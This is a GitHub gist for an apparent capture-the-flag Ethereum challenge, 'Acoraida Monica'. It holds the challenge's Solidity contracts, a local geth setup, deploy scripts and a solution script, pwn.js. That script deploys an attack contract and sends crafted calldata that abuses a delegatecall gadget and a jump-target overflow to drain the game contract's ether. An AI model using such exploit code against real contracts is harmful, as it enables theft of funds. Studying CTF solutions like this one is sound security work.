Last active
February 10, 2024 13:13
-
-
Save LiveOverflow/21c8a505ca176e5bb20bc94eb23acdf1 to your computer and use it in GitHub Desktop.
Acoraida Monica
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * The contract deployed on this address is a | |
| */ | |
| pragma solidity =0.4.25; | |
| contract b{ | |
| function Start(string _question, string _answer) public payable; | |
| } | |
| contract a{ | |
| constructor(address t, string q, string r) public{ | |
| b(t).Start(q,r); | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity =0.4.25; | |
| contract AcoraidaMonicaGame{ | |
| uint256 public version = 4; | |
| string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?"; | |
| string public constant sampleQuestion = "Who is Acoraida Monica?"; | |
| string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D"; | |
| Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3); | |
| address questioner; | |
| string public question; | |
| bytes32 private answerHash; | |
| constructor(bytes a) { | |
| assembly{ | |
| pc | |
| 0xe1 | |
| add | |
| jump | |
| } | |
| } | |
| modifier onlyHuman{ | |
| uint size; | |
| address addr = msg.sender; | |
| assembly { size := extcodesize(addr) } | |
| require(size==0); | |
| _; | |
| } | |
| function Start(string _question, string _answer) public payable{ | |
| if(answerHash==0){ | |
| answerHash = keccak256(_answer); | |
| question = _question; | |
| questioner = msg.sender; | |
| } | |
| } | |
| function NewRound(string _question, bytes32 _answerHash) public payable{ | |
| if(msg.sender == questioner && msg.value >= 0.5 ether){ | |
| require(_answerHash != keccak256(sampleAnswer)); | |
| question = _question; | |
| answerHash = _answerHash; | |
| logger.AcoraidaMonicaWantsToKnowTheNewQuestion(_question); | |
| logger.AcoraidaMonicaWantsToKnowTheNewAnswerHash(_answerHash); | |
| } | |
| } | |
| function TheAnswerIs(string _answer) onlyHuman public payable{ | |
| //require(msg.sender != questioner); | |
| if(answerHash == keccak256(_answer) && msg.value >= 1 ether){ | |
| questioner = msg.sender; | |
| msg.sender.transfer(address(this).balance); | |
| logger.AcoraidaMonicaWantsToKeepALogOfTheWinner(msg.sender); | |
| } | |
| } | |
| /*function setLogger(address _log) public { | |
| require(msg.sender == questioner); | |
| logger = Logger(_log); | |
| }*/ | |
| function () payable {} | |
| } | |
| contract Logger{ | |
| event WeHaveAWinner(address); | |
| event NewQuestion(string); | |
| event NewAnswerHs(bytes32); | |
| function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public { | |
| emit WeHaveAWinner(winner); | |
| } | |
| function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public{ | |
| emit NewQuestion(_question); | |
| } | |
| function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public { | |
| emit NewAnswerHs(_answerHash); | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const Web3 = require('web3') | |
| const Tx = require('ethereumjs-tx') | |
| /* | |
| $ rm -rf data | |
| $ geth --datadir ./data init genesis.json | |
| $ geth --datadir ./data --rpcapi eth,personal,web3,admin,miner,debug --rpc --mine --etherbase "0x492705c00090cb7c1cbb5ec3ab0b09f310dec399" --rpccorsdomain "*" --networkid="31231" --nodiscover | |
| $ geth attach http://127.0.0.1:8545 | |
| > miner.start() | |
| $ node deploy.js | |
| LoggerAgent contract: 0xFEB07903B4972f4A668932D86C54D9D5264797cF | |
| Logger contract: 0x5ba0805d3aba403ab3eB4A61fE31Cd7BBdd1e576 | |
| AcoraidaMonicaGame contract: 0x3A3AAC709285A54f7E0548b1609B3a8c96d7Fb09 | |
| LoggerAgent upgrade() success: true | |
| a contract: 0x4AC502228e8FE102984BcB38c15859EeC9509E0F | |
| AcoraidaMonicaGame Start() success: true | |
| */ | |
| // local geth network | |
| const web3 = new Web3(new Web3.providers.HttpProvider('http://127.0.0.1:8545')) | |
| const privateKey = new Buffer('748e86e90bc4b3f894d79ff84cec01067ab8e7337e66d8747b6ebc453191ac4e', 'hex') | |
| const addressFrom = '0x47a1b97b7A1f1Ad90741Ea94230b2361667fa2DB' | |
| // variables to remember the LoggerAgent and AcoraidaMonicaGame contract | |
| var loggerAgent; | |
| var gameContract; | |
| // create "LoggerAgent" contract | |
| var tx = new Tx({ | |
| nonce: '0x00', | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| value: '0x00', | |
| from: addressFrom, | |
| data: '0x608060405234801561001057600080fd5b50604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a019020610056903364010000000061005b810204565b61005f565b9055565b6102c48061006e6000396000f3006080604052600436106100615763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630900f010811461007357806313af4035146100a15780635c60da1b146100cf5780638da5cb5b1461010d575b61007161006c610122565b610165565b005b34801561007f57600080fd5b5061007173ffffffffffffffffffffffffffffffffffffffff60043516610189565b3480156100ad57600080fd5b5061007173ffffffffffffffffffffffffffffffffffffffff600435166101f1565b3480156100db57600080fd5b506100e4610122565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b34801561011957600080fd5b506100e4610256565b604080517f536f20697320686572206c6f67676572203a44000000000000000000000000008152905190819003601301902060009061016090610290565b905090565b3660008037600080366000845af43d6000803e808015610184573d6000f35b3d6000fd5b33610192610256565b73ffffffffffffffffffffffffffffffffffffffff16146101b257600080fd5b604080517f536f20697320686572206c6f67676572203a4400000000000000000000000000815290519081900360130190206101ee9082610294565b50565b336101fa610256565b73ffffffffffffffffffffffffffffffffffffffff161461021a57600080fd5b604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a0190206101ee9082610294565b604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a019020600090610160905b5490565b90555600a165627a7a72305820037b138c3c4ca69837603d87247d193891ab9393bbf5f87ec357fca896cc7e5e0029' | |
| }); | |
| tx.sign(privateKey); | |
| web3.eth.sendSignedTransaction('0x'+tx.serialize().toString('hex')).on('receipt', t => { | |
| console.log("LoggerAgent contract: "+ t.contractAddress); | |
| loggerAgent = t.contractAddress; | |
| // create "Logger" contract | |
| var tx = new Tx({ | |
| nonce: '0x01', | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| value: '0x00', | |
| from: addressFrom, | |
| data: '0x608060405234801561001057600080fd5b50610246806100206000396000f3006080604052600436106100565763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630900f010811461005b578063679e11491461008b578063f1952473146100a3575b600080fd5b34801561006757600080fd5b5061008973ffffffffffffffffffffffffffffffffffffffff600435166100fc565b005b34801561009757600080fd5b50610089600435610148565b3480156100af57600080fd5b506040805160206004803580820135601f810184900484028501840190955284845261008994369492936024939284019190819084018382808284375094975061017e9650505050505050565b6040805173ffffffffffffffffffffffffffffffffffffffff8316815290517f10233db257888c60414333eee11dab8e8dabaf552466002fee253e03615db1d19181900360200190a150565b6040805182815290517ff364df9ddb52f724ebe11e75eeec2201580773fcb1e859511504ae872d4bf4569181900360200190a150565b7f0230497b4479b19065f0fe9c0bdee0259402f893cfa9e9b6a44fbf6ecca6299c816040518080602001828103825283818151815260200191508051906020019080838360005b838110156101dd5781810151838201526020016101c5565b50505050905090810190601f16801561020a5780820380516001836020036101000a031916815260200191505b509250505060405180910390a1505600a165627a7a72305820a0f75e6ea7890191aded7de6d24ce8c95b6effc66e67e5b577d26eedb1738e7f0029' | |
| }); | |
| tx.sign(privateKey); | |
| web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => { | |
| console.log("Logger contract: "+ t.contractAddress); | |
| // create "AcoraidaMonicaGame" contract | |
| var tx = new Tx({ | |
| nonce: '0x02', | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| value: '0x00', | |
| from: addressFrom, | |
| data: '0x6004600055610120604052607960808190527f41636f7261696461204d6f6e6963612061646d6972657320736d61727420677560a09081527f79732c207368652764206c696b6520746f20706179203130303030455448207460c0527f6f20746865206f6e652077686f20636f756c6420616e7377657220686572207160e0527f75657374696f6e2e20576f756c6420697420626520796f753f00000000000000610100526100b191600191906100db565b503480156100be57600080fd5b50604051610177380380610177833981016040528051015860e101565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061011c57805160ff1916838001178555610149565b82800160010185558215610149579182015b8281111561014957825182559160200191906001019061012e565b50610155929150610159565b5090565b61017391905b80821115610155576000815560010161015f565b905600000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000009d55b633ccfd60b61262a556109c4610171f36080604052600436106100985763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663281ba0a8811461009a5780633fad9ae01461012457806346a3ec671461013957806354fd4d50146101855780637284e416146101ac578063aa332032146101c1578063c76de3e91461020f578063f24ccbfe14610299578063f7ff68a3146102d7575b005b3480156100a657600080fd5b506100af6102ec565b6040805160208082528351818301528351919283929083019185019080838360005b838110156100e95781810151838201526020016100d1565b50505050905090810190601f1680156101165780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561013057600080fd5b506100af61034c565b6040805160206004803580820135601f81018490048402850184019095528484526100989436949293602493928401919081908401838280828437509497506103da9650505050505050565b34801561019157600080fd5b5061019a61053b565b60408051918252519081900360200190f35b3480156101b857600080fd5b506100af610541565b6040805160206004803580820135601f8101849004840285018401909552848452610098943694929360249392840191908190840183828082843750949750509335945061059b9350505050565b6040805160206004803580820135601f810184900484028501840190955284845261009894369492936024939284019190819084018382808284375050604080516020601f89358b018035918201839004830284018301909452808352979a9998810197919650918201945092508291508401838280828437509497506108139650505050505050565b3480156102a557600080fd5b506102ae6108ae565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b3480156102e357600080fd5b506100af6108c6565b606060405190810160405280603081526020017f242a2126235e5b602061402e333b5461262a54602052603c607e355a605e355681526020017f20596f752062656174206d6521203a440000000000000000000000000000000081525081565b6003805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156103d25780601f106103a7576101008083540402835291602001916103d2565b820191906000526020600020905b8154815290600101906020018083116103b557829003601f168201915b505050505081565b33803b9081156103e957600080fd5b826040518082805190602001908083835b602083106104195780518252601f1990920191602091820191016103fa565b5181516020939093036101000a60001901801990911692169190911790526040519201829003909120600454149250508115905061045f5750670de0b6b3a76400003410155b15610536576002805473ffffffffffffffffffffffffffffffffffffffff1916339081179091556104b13660a01415815761402e61049d3361ffff16565b5101561580156104b1563d6000803e3d6000fd5b50604080517f0900f010000000000000000000000000000000000000000000000000000000008152336004820152905173FEB07903B4972f4A668932D86C54D9D5264797cF91630900f01091602480830192600092919082900301818387803b15801561051d57600080fd5b505af1158015610531573d6000803e3d6000fd5b505050505b505050565b60005481565b60018054604080516020600284861615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156103d25780601f106103a7576101008083540402835291602001916103d2565b60025473ffffffffffffffffffffffffffffffffffffffff16331480156105ca57506706f05b59d3b200003410155b1561080f5760408051606081018252603080825256242a2126235e5b602061402e333b5461262a54602052603c607e355a605e3556602083019081527f20596f752062656174206d6521203a4400000000000000000000000000000000838501529251919282918083835b602083106106545780518252601f199092019160209182019101610635565b5181516020939093036101000a60001901801990911692169190911790526040519201829003909120841415925061068e91505057600080fd5b81516106a19060039060208501906108fd565b5060048181556040517ff1952473000000000000000000000000000000000000000000000000000000008152602091810182815284516024830152845173FEB07903B4972f4A668932D86C54D9D5264797cF9363f195247393879392839260449092019185019080838360005b8381101561072657818101518382015260200161070e565b50505050905090810190601f1680156107535780820380516001836020036101000a031916815260200191505b5092505050600060405180830381600087803b15801561077257600080fd5b505af1158015610786573d6000803e3d6000fd5b5050604080517f679e114900000000000000000000000000000000000000000000000000000000815260048101859052905173FEB07903B4972f4A668932D86C54D9D5264797cF935063679e11499250602480830192600092919082900301818387803b1580156107f657600080fd5b505af115801561080a573d6000803e3d6000fd5b505050505b5050565b600454151561080f57806040518082805190602001908083835b6020831061084c5780518252601f19909201916020918201910161082d565b51815160209384036101000a600019018019909216911617905260405191909301819003902060045550845161088a935060039250908501906108fd565b506002805473ffffffffffffffffffffffffffffffffffffffff1916331790555050565b73FEB07903B4972f4A668932D86C54D9D5264797cF81565b60408051808201909152601781527f57686f2069732041636f7261696461204d6f6e6963613f000000000000000000602082015281565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061093e57805160ff191683800117855561096b565b8280016001018555821561096b579182015b8281111561096b578251825591602001919060010190610950565b5061097792915061097b565b5090565b61099591905b808211156109775760008155600101610981565b905600a165627a7a723058205bf450560abe05048d3aecd129bb6420ca5acbef2f19c0ef9dca3f158d49e23f00290000000000000000000000' | |
| }); | |
| tx.sign(privateKey); | |
| web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => { | |
| console.log("AcoraidaMonicaGame contract: "+ t.contractAddress); | |
| gameContract = t.contractAddress; | |
| // call upgrade() on LoggerAgent | |
| var tx = new Tx({ | |
| nonce: '0x03', | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| value: '0x00', | |
| to: loggerAgent, | |
| from: addressFrom, | |
| data: '0x608060405234801561001057600080fd5b506040516101be3803806101be8339810160408181528251602080850151838601517fc76de3e90000000000000000000000000000000000000000000000000000000086526004860194855290860180516044870152805193969095910193600160a060020a0387169363c76de3e993879387939283926024830192606401919087019080838360005b838110156100b257818101518382015260200161009a565b50505050905090810190601f1680156100df5780820380516001836020036101000a031916815260200191505b50838103825284518152845160209182019186019080838360005b838110156101125781810151838201526020016100fa565b50505050905090810190601f16801561013f5780820380516001836020036101000a031916815260200191505b50945050505050600060405180830381600087803b15801561016057600080fd5b505af1158015610174573d6000803e3d6000fd5b505050505050506035806101896000396000f3006080604052600080fd00a165627a7a723058203e4de9ab30a2fe5e13562c8ce9a8dbc53b04e0ebee143230356f0bebf608c9380029000000000000000000000000feb07903b4972f4a668932d86c54d9d5264797cf000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017200000000000000000000000000000000000000000000000000000000000000' | |
| }); | |
| tx.sign(privateKey); | |
| web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => { | |
| console.log("LoggerAgent upgrade() success: "+t.status); | |
| /* | |
| contract b{ | |
| function Start(string _question, string _answer) public payable; | |
| } | |
| contract a{ | |
| constructor(address t, string q, string r) public{ | |
| b(t).Start(q,r); | |
| } | |
| } | |
| */ | |
| // create "a" contract | |
| var tx = new Tx({ | |
| nonce: '0x04', | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| value: '0x0', | |
| from: addressFrom, | |
| data: '0x608060405234801561001057600080fd5b506040516101be3803806101be8339810160408181528251602080850151838601517fc76de3e90000000000000000000000000000000000000000000000000000000086526004860194855290860180516044870152805193969095910193600160a060020a0387169363c76de3e993879387939283926024830192606401919087019080838360005b838110156100b257818101518382015260200161009a565b50505050905090810190601f1680156100df5780820380516001836020036101000a031916815260200191505b50838103825284518152845160209182019186019080838360005b838110156101125781810151838201526020016100fa565b50505050905090810190601f16801561013f5780820380516001836020036101000a031916815260200191505b50945050505050600060405180830381600087803b15801561016057600080fd5b505af1158015610174573d6000803e3d6000fd5b505050505050506035806101896000396000f3006080604052600080fd00a165627a7a723058203e4de9ab30a2fe5e13562c8ce9a8dbc53b04e0ebee143230356f0bebf608c93800290000000000000000000000003A3AAC709285A54f7E0548b1609B3a8c96d7Fb09000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017200000000000000000000000000000000000000000000000000000000000000' | |
| }); | |
| tx.sign(privateKey); | |
| web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => { | |
| console.log("a contract: "+ t.contractAddress); | |
| // call Start() on AcoraidaMonicaGame and send Ether | |
| var tx = new Tx({ | |
| nonce: '0x05', | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| value: '0xd3c21bcecceda1000000', | |
| from: addressFrom, | |
| to: gameContract, | |
| data: '0xc76de3e9000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000027596f75206e65656420612063616d65726120696e7374656164206f66206772617920686169722e00000000000000000000000000000000000000000000000000' | |
| }); | |
| tx.sign(privateKey); | |
| web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => { | |
| console.log("AcoraidaMonicaGame Start() success: "+t.status); | |
| }); | |
| }); | |
| }); | |
| }); | |
| }); | |
| }); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "config": { | |
| "chainId": 31231, | |
| "homesteadBlock": 0, | |
| "eip155Block": 0, | |
| "eip158Block": 0, | |
| "byzantiumBlock": 0 | |
| }, | |
| "coinbase": "0x492705c00090cb7c1cbb5ec3ab0b09f310dec399", | |
| "difficulty": "0", | |
| "gasLimit": "10000000000000", | |
| "alloc": { | |
| "0xcf2f3781229416d78c9861c9a5f0617ba5ca96af": { | |
| "balance": "100000000000000000000000000000" | |
| }, | |
| "0x47a1b97b7A1f1Ad90741Ea94230b2361667fa2DB": { | |
| "balance": "100000000000000000000000000000" | |
| }, | |
| "0x19baa751d1092c906ac84ea4681fa91e269e6cb9": { | |
| "balance": "200000000000000000000" | |
| }, | |
| "0x492705c00090cb7c1cbb5ec3ab0b09f310dec399": { | |
| "balance": "100000000000000000000000000000" | |
| }, | |
| "0xf29e621ee00eb8aca28f7fab785c054e465805e6": { | |
| "balance": "200000000000000000000" | |
| } | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract LiveOverflow{ | |
| address constant public player = 0x0019baa751d1092c906ac84ea4681fa91e269e6cb9; | |
| address constant public game = 0x003a3aac709285a54f7e0548b1609b3a8c96d7fb09; | |
| function withdraw() public payable returns (uint256) { | |
| player.transfer(game.balance); | |
| return 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7; | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // logger.js | |
| var Web3 = require('web3'); | |
| web3 = new Web3('http://127.0.0.1:8545') | |
| function getBlock(number) { | |
| web3.eth.getBlock(number, (err, block) => { | |
| if (block != null) { | |
| //console.log("====== BLOCK # "+number+" ========"); | |
| //console.log(block) | |
| block.transactions.forEach(tx => { | |
| //console.log("====== BLOCK # "+number+" TX # "+tx+" ========"); | |
| //console.log(tx) | |
| web3.eth.getTransaction(tx).then((err, _tx) => { | |
| console.log("====== BLOCK # "+number+" | TX # "+tx+" ========"); | |
| console.log(err); | |
| }); | |
| web3.eth.getTransactionReceipt(tx).then((err, _tx) => { | |
| console.log("====== BLOCK # "+number+" | Receipt # "+tx+" ========"); | |
| console.log(err); | |
| }); | |
| }) | |
| } | |
| getBlock(number + 1) | |
| }); | |
| } | |
| getBlock(0); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * The contract deployed on this address is Logger | |
| */ | |
| pragma solidity =0.4.25; | |
| contract Logger{ | |
| event WeHaveAWinner(address); | |
| event NewQuestion(string); | |
| event NewAnswerHs(bytes32); | |
| function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public { | |
| emit WeHaveAWinner(winner); | |
| } | |
| function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public{ | |
| emit NewQuestion(_question); | |
| } | |
| function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public { | |
| emit NewAnswerHs(_answerHash); | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * The contract deployed on this address is LoggerAgent | |
| */ | |
| pragma solidity =0.4.25; | |
| contract LoggerAgent{ | |
| bytes32 private constant ownerSlot = keccak256("Acoraida Monica is cute :P"); | |
| bytes32 private constant implSlot = keccak256("So is her logger :D"); | |
| constructor() public{ | |
| setAddress(ownerSlot, msg.sender); | |
| } | |
| modifier onlyOwner{ | |
| require(owner()==msg.sender); | |
| _; | |
| } | |
| function getAddress(bytes32 _slot) internal view returns (address value) { | |
| bytes32 s = _slot; | |
| assembly {value := sload(s)} | |
| } | |
| function setAddress(bytes32 _slot, address _address) internal { | |
| bytes32 s = _slot; | |
| assembly {sstore(s, _address)} | |
| } | |
| function owner() public view returns (address){ | |
| return getAddress(ownerSlot); | |
| } | |
| function implementation() public view returns (address){ | |
| return getAddress(implSlot); | |
| } | |
| function setOwner(address _owner) onlyOwner public{ | |
| setAddress(ownerSlot, _owner); | |
| } | |
| function upgrade(address _impl) onlyOwner public { | |
| setAddress(implSlot, _impl); | |
| } | |
| function _delegateforward(address _impl) internal { | |
| assembly { | |
| calldatacopy(0, 0, calldatasize) | |
| let result := delegatecall(gas, _impl, 0, calldatasize, 0, 0) | |
| returndatacopy(0, 0, returndatasize) | |
| switch result | |
| case 0 {revert(0, returndatasize)} | |
| default {return(0, returndatasize)} | |
| } | |
| } | |
| function () payable public{ | |
| _delegateforward(implementation()); | |
| } | |
| } | |
| contract Logger{ | |
| event WeHaveAWinner(address); | |
| event NewQuestion(string); | |
| event NewAnswerHs(bytes32); | |
| function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public { | |
| emit WeHaveAWinner(winner); | |
| } | |
| function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public{ | |
| emit NewQuestion(_question); | |
| } | |
| function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public { | |
| emit NewAnswerHs(_answerHash); | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // pwn.js | |
| var Web3 = require('web3'); | |
| const Tx = require('ethereumjs-tx') | |
| //web3 = new Web3('http://100.100.0.4:8090/twO7sl%2BRT0%2BTyBUCbrQ%2BjQ%3D%3D') | |
| const web3 = new Web3(new Web3.providers.HttpProvider('http://127.0.0.1:8545')) | |
| // 0x19baa751d1092c906ac84ea4681fa91e269e6cb9 | |
| const privateKeyPlayer = new Buffer('91ca018bbf10b7c61d4d3b863298b1b26e2332f242e090dd35c4b314c5eeebf6', 'hex'); | |
| // 0xf29e621ee00eb8aca28f7fab785c054e465805e6 | |
| const privateKeyAttack = new Buffer('3e38f85bac0f090b02bccb10ca168969254823d751b73937e8f8aa5c207a2e8a', 'hex'); | |
| /* | |
| contract LiveOverflow{ | |
| address constant public player = 0x0019baa751d1092c906ac84ea4681fa91e269e6cb9; | |
| address constant public game = 0x003a3aac709285a54f7e0548b1609b3a8c96d7fb09; | |
| function withdraw() public payable returns (uint256) { | |
| player.transfer(game.balance); | |
| // jump target integer overflow | |
| return 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7; | |
| } | |
| } | |
| */ | |
| // create LiveOverflow attack contract with player privatekey | |
| var tx = new Tx({ | |
| nonce: '0x00', | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| value: '0x0', | |
| from: '0x19baa751d1092c906ac84ea4681fa91e269e6cb9', // Player | |
| data: '0x608060405234801561001057600080fd5b50610232806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680633ccfd60b1461005c57806348db5f891461007a578063c3fe3e28146100d1575b600080fd5b610064610128565b6040518082815260200191505060405180910390f35b34801561008657600080fd5b5061008f6101d6565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156100dd57600080fd5b506100e66101ee565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b60007319baa751d1092c906ac84ea4681fa91e269e6cb973ffffffffffffffffffffffffffffffffffffffff166108fc733a3aac709285a54f7e0548b1609b3a8c96d7fb0973ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156101af573d6000803e3d6000fd5b507ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7905090565b7319baa751d1092c906ac84ea4681fa91e269e6cb981565b733a3aac709285a54f7e0548b1609b3a8c96d7fb09815600a165627a7a723058207e04ac9f2efaab04eecec5a56e18c5b285cd574fa308ac0b3a5567897979fcc30029' | |
| }) | |
| tx.sign(privateKeyPlayer); | |
| web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => { | |
| console.log('LiveOverflow Attack Contract created: '+t.contractAddress); | |
| // 0x5e6 | |
| var account = web3.eth.accounts.privateKeyToAccount("0x"+privateKeyAttack.toString('hex')); | |
| console.log("Attack address: "+account.address) | |
| payload = '0x46a3ec67' // TheAnswerIs | |
| payload += '0000000000000000000000000000000000000000000000000000000000000020' | |
| payload += '0000000000000000000000000000000000000000000000000000000000000001' // answer length | |
| payload += '7200000000000000000000000000000000000000000000000000000000000000' // answer "r" | |
| payload += '00000000000000000000000000000000000000000000000009a2' // delegatecall JOP gadget | |
| payload += '000000000000000000000000d958E2a8d4751665E6292267fA3f436fE13d3265' // <- t.contractAddress (Attack Contract) | |
| payload += '4848'; | |
| web3.eth.getTransactionCount(account.address).then(txCount => { | |
| var tx = new Tx({ | |
| nonce: txCount, | |
| gasPrice: '0x1', | |
| gasLimit: '0x2DC6C0', | |
| to: '0x3A3AAC709285A54f7E0548b1609B3a8c96d7Fb09', // AcoraidaMonicaGame contract | |
| value: '0xde0b6b3a7640001', // 1 Ether | |
| from: account.address, | |
| data: payload, | |
| }); | |
| tx.sign(privateKeyAttack); | |
| web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')) | |
| .on('transactionHash', function(hash){ | |
| console.log("transactionHash: "+hash); | |
| }) | |
| .on('receipt', function(receipt){ | |
| console.log("Attack success: "+receipt.status) | |
| console.log(receipt); | |
| }) | |
| .on('error', console.error); | |
| }); | |
| }); |
nice hacked
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
nice work